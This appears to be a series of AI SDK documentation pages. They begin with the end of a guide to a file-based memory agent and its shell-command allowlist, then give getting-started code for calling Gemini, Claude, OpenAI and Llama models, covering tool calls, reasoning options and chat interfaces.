// Run the agent (loops automatically on tool calls)
const result = await memoryAgent.generate({ prompt });

// Record the assistant response
await appendConversation({
  role: 'assistant',
  content: result.text,
  timestamp: new Date().toISOString(),
});

console.log(result.text);

A typical interaction looks like this:

User says "Remember that my favorite editor is Neovim"
The model calls memory with echo "- Favorite editor: Neovim" >> /.memory/core.md
The tool executes the command and returns the result
The model responds: "Got it, I've saved that your favorite editor is Neovim."
On the next run, prepareCall reads core.md and the fact appears in the system prompt

Learn More

AI SDK documentation for ToolLoopAgent, tool, and generateText
just-bash for the JavaScript-based bash interpreter and AST parser
AI SDK examples for more agent patterns

Appendix: Implementation Details

Appendix: Filesystem Bootstrap

Define the memory directory structure and bootstrap it on startup. Each file gets reasonable defaults if it does not already exist:

import {
  access,
  appendFile,
  mkdir,
  readFile,
  writeFile,
} from 'node:fs/promises';
import { join, resolve } from 'node:path';

const MEMORY_DIR = '.memory';
const MEMORY_ROOT = resolve(process.cwd(), MEMORY_DIR);
const CORE_MEMORY_PATH = join(MEMORY_ROOT, 'core.md');
const NOTES_PATH = join(MEMORY_ROOT, 'notes.md');
const CONVERSATIONS_PATH = join(MEMORY_ROOT, 'conversations.jsonl');

const DEFAULT_CORE_MEMORY = `# Core Memory
- Keep this short.
- Put stable user facts here.
`;

const DEFAULT_NOTES = `# Notes
Use this file for detailed memories and timestamped notes.
`;

async function ensureFile(path: string, content: string): Promise<void> {
  try {
    await access(path);
  } catch {
    await writeFile(path, content, 'utf8');
  }
}

async function ensureMemoryFilesystem(): Promise<void> {
  await mkdir(MEMORY_ROOT, { recursive: true });
  await ensureFile(CORE_MEMORY_PATH, DEFAULT_CORE_MEMORY);
  await ensureFile(NOTES_PATH, DEFAULT_NOTES);
  await ensureFile(CONVERSATIONS_PATH, '');
}

Add .memory to your .gitignore to keep memory local and private.

Appendix: Helper Functions

One helper reads core memory for system prompt injection, the other appends conversation entries as JSONL:

async function readCoreMemory(): Promise<string> {
  try {
    return await readFile(CORE_MEMORY_PATH, 'utf8');
  } catch {
    return '';
  }
}

async function appendConversation(entry: {
  role: 'user' | 'assistant';
  content: string;
  timestamp: string;
}): Promise<void> {
  await appendFile(CONVERSATIONS_PATH, `${JSON.stringify(entry)}\n`, 'utf8');
}

Appendix: Structured Actions Handler

The runMemoryCommand function used in Route A maps each action to a filesystem operation. Paths are resolved relative to the memory root, and only known memory files are allowed:

import { readFile, writeFile, appendFile } from 'node:fs/promises';
import { join, relative } from 'node:path';

const MEMORY_FILES = ['core.md', 'notes.md', 'conversations.jsonl'];

function resolveMemoryPath(path: string): string {
  const relativePath = path
    .trim()
    .replace(/^\/?memories\/?/, '')
    .replace(/^\/?\.memory\/?/, '')
    .replace(/^\/+/, '');

  if (!MEMORY_FILES.includes(relativePath)) {
    throw new Error(`Unsupported memory path: ${path}`);
  }

  return join(MEMORY_ROOT, relativePath);
}

async function runMemoryCommand(input: {
  command: 'view' | 'create' | 'update' | 'search';
  path?: string;
  content?: string;
  mode?: 'append' | 'overwrite';
  query?: string;
}): Promise<string> {
  const { command, path, content, mode, query } = input;

  switch (command) {
    case 'view': {
      if (!path) throw new Error('path is required for view');
      return await readFile(resolveMemoryPath(path), 'utf8');
    }
    case 'create':
    case 'update': {
      if (!path) throw new Error('path is required');
      if (!content) throw new Error('content is required');
      const target = resolveMemoryPath(path);
      if (mode === 'append') {
        await appendFile(target, content, 'utf8');
      } else {
        await writeFile(target, content, 'utf8');
      }
      return `${command === 'create' ? 'Created' : 'Updated'} ${path}`;
    }
    case 'search': {
      if (!query) throw new Error('query is required for search');
      const terms = query.toLowerCase().split(/\s+/).filter(Boolean);
      const files = path
        ? [resolveMemoryPath(path)]
        : MEMORY_FILES.map(f => join(MEMORY_ROOT, f));
      const matches: string[] = [];

      for (const filePath of files) {
        const lines = (await readFile(filePath, 'utf8')).split('\n');
        for (const [i, line] of lines.entries()) {
          const lower = line.toLowerCase();
          if (terms.some(t => lower.includes(t))) {
            matches.push(`${relative(MEMORY_ROOT, filePath)}:${i + 1}:${line}`);
          }
        }
      }

      return matches.length > 0 ? matches.join('\n') : 'No matches found.';
    }
  }
}

Appendix: Command Guard

import {
  type CommandNode,
  parse,
  type ScriptNode,
  type WordNode,
} from 'just-bash';

const approvedCommands = new Set([
  'cat',
  'echo',
  'grep',
  'jq',
  'ls',
  'mkdir',
  'perl',
  'sed',
  'tail',
]);

function extractLiteralWord(word: WordNode | null): string | null {
  if (!word || word.parts.length !== 1) return null;
  const [part] = word.parts;
  if (!part || part.type !== 'Literal') return null;
  return part.value;
}

function collectCommandNames(script: ScriptNode): string[] {
  const names = new Set<string>();

  const visitCommand = (command: CommandNode): void => {
    switch (command.type) {
      case 'SimpleCommand': {
        const name = extractLiteralWord(command.name);
        if (name) names.add(name);
        break;
      }
      case 'If': {
        for (const clause of command.clauses) {
          for (const s of clause.condition) visitStatement(s);
          for (const s of clause.body) visitStatement(s);
        }
        if (command.elseBody) {
          for (const s of command.elseBody) visitStatement(s);
        }
        break;
      }
      case 'For':
      case 'CStyleFor':
      case 'While':
      case 'Until':
      case 'Subshell':
      case 'Group': {
        for (const s of command.body) visitStatement(s);
        break;
      }
      case 'Case': {
        for (const item of command.items) {
          for (const s of item.body) visitStatement(s);
        }
        break;
      }
      case 'FunctionDef': {
        visitCommand(command.body);
        break;
      }
      case 'ArithmeticCommand':
      case 'ConditionalCommand':
        break;
    }
  };

  const visitStatement = (
    statement: ScriptNode['statements'][number],
  ): void => {
    for (const pipeline of statement.pipelines) {
      for (const command of pipeline.commands) {
        visitCommand(command);
      }
    }
  };

  for (const statement of script.statements) {
    visitStatement(statement);
  }

  return [...names].sort();
}

export function findUnapprovedCommand(commandLine: string): string | null {
  let script: ScriptNode;
  try {
    script = parse(commandLine);
  } catch {
    return null;
  }
  const commandNames = collectCommandNames(script);
  return commandNames.find(name => !approvedCommands.has(name)) ?? null;
}

title: Get started with Gemini 3 description: Get started with Gemini 3 using the AI SDK. tags: ['getting-started']

Get started with Gemini 3

Gemini 3

Gemini 3 represents a significant leap forward in AI capabilities, combining all of Gemini's strengths together to help you bring any idea to life. It delivers:

State-of-the-art reasoning with unprecedented depth and nuance
PhD-level performance on complex benchmarks like Humanity's Last Exam (37.5%) and GPQA Diamond (91.9%)
Leading multimodal understanding with 81% on MMMU-Pro and 87.6% on Video-MMMU
Best-in-class vibe coding and agentic capabilities
Superior long-horizon planning for multi-step workflows

Gemini 3 Pro is currently available in preview, offering great performance across all benchmarks.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Gemini 3 with the AI SDK:

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text } = await generateText({
  model: google('gemini-3-pro-preview'),
  prompt: 'Explain the concept of the Hilbert space.',
});
console.log(text);

Enhanced Reasoning with Thinking Mode

Gemini 3 models can use enhanced reasoning through thinking mode, which improves their ability to solve complex problems. You can control the thinking level using the thinkingLevel provider option:

import { google, GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text } = await generateText({
  model: google('gemini-3-pro-preview'),
  prompt: 'What is the sum of the first 10 prime numbers?',
  providerOptions: {
    google: {
      thinkingConfig: {
        includeThoughts: true,
        thinkingLevel: 'low',
      },
    } satisfies GoogleLanguageModelOptions,
  },
});

console.log(text);

The thinkingLevel parameter accepts different values to control the depth of reasoning applied to your prompt:

Gemini 3 Pro supports: 'low' and 'high'
Gemini 3 Flash supports: 'minimal', 'low', 'medium', and 'high'

Using Tools with the AI SDK

Gemini 3 excels at tool calling with improved reliability and consistency for multi-step workflows. Here's an example of using tool calling with the AI SDK:

import { z } from 'zod';
import { generateText, tool, isStepCount } from 'ai';
import { google } from '@ai-sdk/google';

const result = await generateText({
  model: google('gemini-3-pro-preview'),
  prompt: 'What is the weather in San Francisco?',
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
  stopWhen: isStepCount(5), // enables multi-step calling
});

console.log(result.text);

console.log(result.steps);

Using Google Search with Gemini

With search grounding, Gemini can access the latest information using Google search. Here's an example of using Google Search with the AI SDK:

import { google } from '@ai-sdk/google';
import { GoogleProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text, sources, providerMetadata } = await generateText({
  model: google('gemini-3-pro-preview'),
  tools: {
    google_search: google.tools.googleSearch({}),
  },
  prompt:
    'List the top 5 San Francisco news from the past week.' +
    'You must include the date of each article.',
});

// access the grounding metadata. Casting to the provider metadata type
// is optional but provides autocomplete and type safety.
const metadata = providerMetadata?.google as
  | GoogleProviderMetadata
  | undefined;
const groundingMetadata = metadata?.groundingMetadata;
const safetyRatings = metadata?.safetyRatings;

console.log({ text, sources, groundingMetadata, safetyRatings });

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, and streamed JSON into your app.

Let's explore building a chatbot with Next.js, the AI SDK, and Gemini 3 Pro:

In a new Next.js application, first install the AI SDK and the Google provider:

Then, create a route handler for the chat endpoint:

import { google } from '@ai-sdk/google';
import { streamText, UIMessage, convertToModelMessages } from 'ai';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: google('gemini-3-pro-preview'),
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Chat() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();
  return (
    <div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
      {messages.map(message => (
        <div key={message.id} className="whitespace-pre-wrap">
          {message.role === 'user' ? 'User: ' : 'Gemini: '}
          {message.parts.map((part, i) => {
            switch (part.type) {
              case 'text':
                return <div key={`${message.id}-${i}`}>{part.text}</div>;
            }
          })}
        </div>
      ))}

      <form
        onSubmit={e => {
          e.preventDefault();
          sendMessage({ text: input });
          setInput('');
        }}
      >
        <input
          className="fixed dark:bg-zinc-900 bottom-0 w-full max-w-md p-2 mb-8 border border-zinc-300 dark:border-zinc-800 rounded shadow-xl"
          value={input}
          placeholder="Say something..."
          onChange={e => setInput(e.currentTarget.value)}
        />
      </form>
    </div>
  );
}

Get Started

Ready to dive in? Here's how you can begin:

Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
Use ready-to-deploy AI templates at vercel.com/templates?type=ai.
Read more about the Google provider.

title: Get started with Claude 4 description: Get started with Claude 4 using the AI SDK. tags: ['getting-started']

Get started with Claude 4

With the release of Claude 4, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities and advanced intelligence.

Claude 4

Prompt Engineering for Claude 4 Models

Claude 4 models respond well to clear, explicit instructions. The following best practices can help achieve optimal performance:

Provide explicit instructions: Clearly state what you want the model to do, including specific steps or formats for the response.
Include context and motivation: Explain why a task is being performed to help the model better understand the underlying goals.
Avoid negative examples: When providing examples, only demonstrate the behavior you want to see, not what you want to avoid.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Claude 4 Sonnet with the AI SDK:

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, reasoningText, reasoning } = await generateText({
  model: anthropic('claude-sonnet-4-20250514'),
  prompt: 'How will quantum computing impact cryptography by 2050?',
});
console.log(text);

Reasoning Ability

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, reasoningText, reasoning } = await generateText({
  model: anthropic('claude-sonnet-4-20250514'),
  prompt: 'How will quantum computing impact cryptography by 2050?',
  providerOptions: {
    anthropic: {
      thinking: { type: 'enabled', budgetTokens: 15000 },
    } satisfies AnthropicLanguageModelOptions,
  },
  headers: {
    'anthropic-beta': 'interleaved-thinking-2025-05-14',
  },
});

console.log(text); // text response
console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, and streamed JSON into your app.

Let's explore building a chatbot with Next.js, the AI SDK, and Claude Sonnet 4:

In a new Next.js application, first install the AI SDK and the Anthropic provider:

Then, create a route handler for the chat endpoint:

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { streamText, convertToModelMessages, type UIMessage } from 'ai';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: anthropic('claude-sonnet-4-20250514'),
    messages: await convertToModelMessages(messages),
    headers: {
      'anthropic-beta': 'interleaved-thinking-2025-05-14',
    },
    providerOptions: {
      anthropic: {
        thinking: { type: 'enabled', budgetTokens: 15000 },
      } satisfies AnthropicLanguageModelOptions,
    },
  });

  return result.toUIMessageStreamResponse({
    sendReasoning: true,
  });
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat({
    transport: new DefaultChatTransport({ api: '/api/chat' }),
  });

  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    if (input.trim()) {
      sendMessage({ text: input });
      setInput('');
    }
  };

  return (
    <div className="flex flex-col h-screen max-w-2xl mx-auto p-4">
      <div className="flex-1 overflow-y-auto space-y-4 mb-4">
        {messages.map(message => (
          <div
            key={message.id}
            className={`p-3 rounded-lg ${
              message.role === 'user' ? 'bg-blue-50 ml-auto' : 'bg-gray-50'
            }`}
          >
            <p className="font-semibold">
              {message.role === 'user' ? 'You' : 'Claude 4'}
            </p>
            {message.parts.map((part, index) => {
              if (part.type === 'text') {
                return (
                  <div key={index} className="mt-1">
                    {part.text}
                  </div>
                );
              }
              if (part.type === 'reasoning') {
                return (
                  <pre
                    key={index}
                    className="bg-gray-100 p-2 rounded mt-2 text-xs overflow-x-auto"
                  >
                    <details>
                      <summary className="cursor-pointer">
                        View reasoning
                      </summary>
                      {part.text}
                    </details>
                  </pre>
                );
              }
            })}
          </div>
        ))}
      </div>
      <form onSubmit={handleSubmit} className="flex gap-2">
        <input
          name="prompt"
          value={input}
          onChange={e => setInput(e.target.value)}
          className="flex-1 p-2 border rounded focus:outline-none focus:ring-2 focus:ring-blue-500"
          placeholder="Ask Claude 4 something..."
        />
        <button
          type="submit"
          className="bg-blue-500 text-white px-4 py-2 rounded hover:bg-blue-600"
        >
          Send
        </button>
      </form>
    </div>
  );
}

Claude 4 Model Variants

Claude 4 is available in two variants, each optimized for different use cases:

Claude Sonnet 4: Balanced performance suitable for most enterprise applications, with significant improvements over Sonnet 3.7.
Claude Opus 4: Anthropic's most powerful model and the best coding model available. Excels at sustained performance on long-running tasks that require focused effort and thousands of steps, with the ability to work continuously for several hours.

Get Started

Ready to dive in? Here's how you can begin:

Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
Use ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: OpenAI Responses API description: Get started with the OpenAI Responses API using the AI SDK. tags: ['getting-started', 'agents']

Get started with OpenAI Responses API

With the release of OpenAI's responses API, there has never been a better time to start building AI applications, particularly those that require a deeper understanding of the world.

The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.

OpenAI Responses API

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call GPT-4o with the new Responses API using the AI SDK:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai.responses('gpt-4o'),
  prompt: 'Explain the concept of quantum entanglement.',
});

Generating Structured Data

While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides generateText and streamText with Output to generate structured data, allowing you to constrain model outputs to a specific schema.

import { generateText, Output } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { output } = await generateText({
  model: openai.responses('gpt-4o'),
  output: Output.object({
    schema: z.object({
      recipe: z.object({
        name: z.string(),
        ingredients: z.array(
          z.object({ name: z.string(), amount: z.string() }),
        ),
        steps: z.array(z.string()),
      }),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

This code snippet will generate a type-safe recipe that conforms to the specified zod schema.

Using Tools with the AI SDK

The Responses API supports tool calling out of the box, allowing it to interact with external systems and perform discrete tasks. Here's an example of using tool calling with the AI SDK:

import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { text } = await generateText({
  model: openai.responses('gpt-4o'),
  prompt: 'What is the weather like today in San Francisco?',
  tools: {
    getWeather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
  stopWhen: isStepCount(5), // enable multi-step 'agentic' LLM calls
});

This example demonstrates how stopWhen transforms a single LLM call into an agent. The stopWhen: isStepCount(5) parameter allows the model to autonomously call tools, analyze results, and make additional tool calls as needed - turning what would be a simple one-shot completion into an intelligent agent that can chain multiple actions together to complete complex tasks.

Web Search Tool

The Responses API introduces a built-in tool for grounding responses called webSearch. With this tool, the model can access the internet to find relevant information for its responses.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai.responses('gpt-4o-mini'),
  prompt: 'What happened in San Francisco last week?',
  tools: {
    web_search_preview: openai.tools.webSearchPreview(),
  },
});

console.log(result.text);
console.log(result.sources);

The webSearch tool also allows you to specify query-specific metadata that can be used to improve the quality of the search results.

import { generateText } from 'ai';

const result = await generateText({
  model: openai.responses('gpt-4o-mini'),
  prompt: 'What happened in San Francisco last week?',
  tools: {
    web_search_preview: openai.tools.webSearchPreview({
      searchContextSize: 'high',
      userLocation: {
        type: 'approximate',
        city: 'San Francisco',
        region: 'California',
      },
    }),
  },
});

console.log(result.text);
console.log(result.sources);

MCP Tool

The Responses API also supports connecting to Model Context Protocol (MCP) servers. This allows models to call tools exposed by remote MCP servers or service connectors.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai.responses('gpt-5-mini'),
  prompt: 'Search the web for the latest NYC mayoral election results',
  tools: {
    mcp: openai.tools.mcp({
      serverLabel: 'web-search',
      serverUrl: 'https://mcp.exa.ai/mcp',
      serverDescription: 'A web-search API for AI agents',
    }),
  },
});

console.log(result.text);

For more details on configuring the MCP tool, including authentication, tool filtering, and connector support, see the OpenAI provider documentation.

Using Persistence

With the Responses API, you can persist chat history with OpenAI across requests. This allows you to send just the user's last message and OpenAI can access the entire chat history.

There are two options available to use persistence:

With previousResponseId

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result1 = await generateText({
  model: openai.responses('gpt-4o-mini'),
  prompt: 'Invent a new holiday and describe its traditions.',
});

const result2 = await generateText({
  model: openai.responses('gpt-4o-mini'),
  prompt: 'Summarize in 2 sentences',
  providerOptions: {
    openai: {
      previousResponseId: result1.providerMetadata?.openai.responseId as string,
    },
  },
});

With Conversations

You can use the Conversation API to create a conversation.

Once you have created a conversation, you can continue it:

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai.responses('gpt-4o-mini'),
  prompt: 'Summarize in 2 sentences',
  providerOptions: {
    openai: {
      // The Conversation ID created via the OpenAI API to continue
      conversation: 'conv_123',
    },
  },
});

Migrating from Completions API

Migrating from the OpenAI Completions API (via the AI SDK) to the new Responses API is simple. To migrate, simply change your provider instance from openai(modelId) to openai.responses(modelId):

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

// Completions API
const { text } = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Explain the concept of quantum entanglement.',
});

// Responses API
const { text } = await generateText({
  model: openai.responses('gpt-4o'),
  prompt: 'Explain the concept of quantum entanglement.',
});

When using the Responses API, provider specific options that were previously specified on the model provider instance have now moved to the providerOptions object:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

// Completions API
const { text } = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Explain the concept of quantum entanglement.',
  providerOptions: {
    openai: {
      parallelToolCalls: false,
    },
  },
});

// Responses API
const { text } = await generateText({
  model: openai.responses('gpt-4o'),
  prompt: 'Explain the concept of quantum entanglement.',
  providerOptions: {
    openai: {
      parallelToolCalls: false,
    },
  },
});

Get Started

Ready to get started? Here's how you can dive in:

Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: Google Gemini Image Generation description: Generate and edit images with Google Gemini 2.5 Flash Image using the AI SDK. tags: ['image-generation', 'google', 'gemini']

Generate and Edit Images with Google Gemini 2.5 Flash

This guide will show you how to generate and edit images with the AI SDK and Google's latest multimodal language model Gemini 2.5 Flash Image.

Generating Images

import { generateText } from 'ai';
import fs from 'node:fs';
import 'dotenv/config';

async function generateImage() {
  const result = await generateText({
    model: 'google/gemini-2.5-flash-image',
    prompt:
      'Create a picture of a nano banana dish in a fancy restaurant with a Gemini theme',
  });

  // Save generated images
  for (const file of result.files) {
    if (file.mediaType.startsWith('image/')) {
      const timestamp = Date.now();
      const fileName = `generated-${timestamp}.png`;

      fs.mkdirSync('output', { recursive: true });
      await fs.promises.writeFile(`output/${fileName}`, file.uint8Array);

      console.log(`Generated and saved image: output/${fileName}`);
    }
  }
}

generateImage().catch(console.error);

Here are some key points to remember:

Generated images are returned in the result.files array
Images are returned as Uint8Array data
The model leverages Gemini's world knowledge, so detailed prompts yield better results

Editing Images

Gemini 2.5 Flash Image excels at editing existing images with natural language instructions. You can add elements, modify styles, or transform images while maintaining their core characteristics:

import { generateText } from 'ai';
import fs from 'node:fs';
import 'dotenv/config';

async function editImage() {
  const editResult = await generateText({
    model: 'google/gemini-2.5-flash-image',
    prompt: [
      {
        role: 'user',
        content: [
          {
            type: 'text',
            text: 'Add a small wizard hat to this cat. Keep everything else the same.',
          },
          {
            type: 'image',
            // image: DataContent (string | Uint8Array | ArrayBuffer | Buffer) or URL
            image: new URL(
              'https://raw.githubusercontent.com/vercel/ai/refs/heads/main/examples/ai-functions/data/comic-cat.png',
            ),
            mediaType: 'image/jpeg',
          },
        ],
      },
    ],
  });

  // Save the edited image
  const timestamp = Date.now();
  fs.mkdirSync('output', { recursive: true });

  for (const file of editResult.files) {
    if (file.mediaType.startsWith('image/')) {
      await fs.promises.writeFile(
        `output/edited-${timestamp}.png`,
        file.uint8Array,
      );
      console.log(`Saved edited image: output/edited-${timestamp}.png`);
    }
  }
}

editImage().catch(console.error);

What's Next?

You've learned how to generate new images from text prompts and edit existing images using natural language instructions with Google's Gemini 2.5 Flash Image model.

For more advanced techniques, integration patterns, and practical examples, check out our Cookbook where you'll find comprehensive guides for building sophisticated AI-powered applications.

title: Get started with Claude 3.7 Sonnet description: Get started with Claude 3.7 Sonnet using the AI SDK. tags: ['getting-started']

Get started with Claude 3.7 Sonnet

With the release of Claude 3.7 Sonnet, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities.

Claude 3.7 Sonnet

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Claude 3.7 Sonnet with the AI SDK:

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, reasoningText, reasoning } = await generateText({
  model: anthropic('claude-3-7-sonnet-20250219'),
  prompt: 'How many people will live in the world in 2040?',
});
console.log(text); // text response

The unified interface also means that you can easily switch between providers by changing just two lines of code. For example, to use Claude 3.7 Sonnet via Amazon Bedrock:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const { reasoning, text } = await generateText({
  model: bedrock('anthropic.claude-3-7-sonnet-20250219-v1:0'),
  prompt: 'How many people will live in the world in 2040?',
});

Reasoning Ability

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, reasoningText, reasoning } = await generateText({
  model: anthropic('claude-3-7-sonnet-20250219'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    anthropic: {
      thinking: { type: 'enabled', budgetTokens: 12000 },
    } satisfies AnthropicLanguageModelOptions,
  },
});

console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and Claude 3.7 Sonnet:

In a new Next.js application, first install the AI SDK and the Anthropic provider:

Then, create a route handler for the chat endpoint:

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { streamText, convertToModelMessages, type UIMessage } from 'ai';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: anthropic('claude-3-7-sonnet-20250219'),
    messages: await convertToModelMessages(messages),
    providerOptions: {
      anthropic: {
        thinking: { type: 'enabled', budgetTokens: 12000 },
      } satisfies AnthropicLanguageModelOptions,
    },
  });

  return result.toUIMessageStreamResponse({
    sendReasoning: true,
  });
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat({
    transport: new DefaultChatTransport({ api: '/api/chat' }),
  });

  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    if (input.trim()) {
      sendMessage({ text: input });
      setInput('');
    }
  };

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) => {
            // text parts:
            if (part.type === 'text') {
              return <div key={index}>{part.text}</div>;
            }
            // reasoning parts:
            if (part.type === 'reasoning') {
              return <pre key={index}>{part.text}</pre>;
            }
          })}
        </div>
      ))}
      <form onSubmit={handleSubmit}>
        <input
          name="prompt"
          value={input}
          onChange={e => setInput(e.target.value)}
        />
        <button type="submit">Send</button>
      </form>
    </>
  );
}

Get Started

Ready to dive in? Here's how you can begin:

Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
Use ready-to-deploy AI templates at vercel.com/templates?type=ai.

Claude 3.7 Sonnet opens new opportunities for reasoning-intensive AI applications. Start building today and leverage the power of advanced reasoning in your AI projects.

title: Get started with Llama 3.1 description: Get started with Llama 3.1 using the AI SDK. tags: ['getting-started']

Get started with Llama 3.1

With the release of Llama 3.1, there has never been a better time to start building AI applications.

Llama 3.1

Benchmarks

Llama 3.1 Benchmarks Source: Meta AI - Llama 3.1 Model Card

Choosing Model Size

Llama 3.1 includes a new 405B parameter model, becoming the largest open-source model available today. This model is designed to handle the most complex and demanding tasks.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Llama 3.1 (using DeepInfra) with the AI SDK:

import { deepinfra } from '@ai-sdk/deepinfra';
import { generateText } from 'ai';

const { text } = await generateText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-405B-Instruct'),
  prompt: 'What is love?',
});

import { generateText } from 'ai';
import { bedrock } from '@ai-sdk/amazon-bedrock';

const { text } = await generateText({
  model: bedrock('meta.llama3-1-405b-instruct-v1'),
  prompt: 'What is love?',
});

Streaming the Response

To stream the model's response as it's being generated, update your code snippet to use the streamText function.

import { streamText } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';

const { textStream } = streamText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-405B-Instruct'),
  prompt: 'What is love?',
});

Generating Structured Data

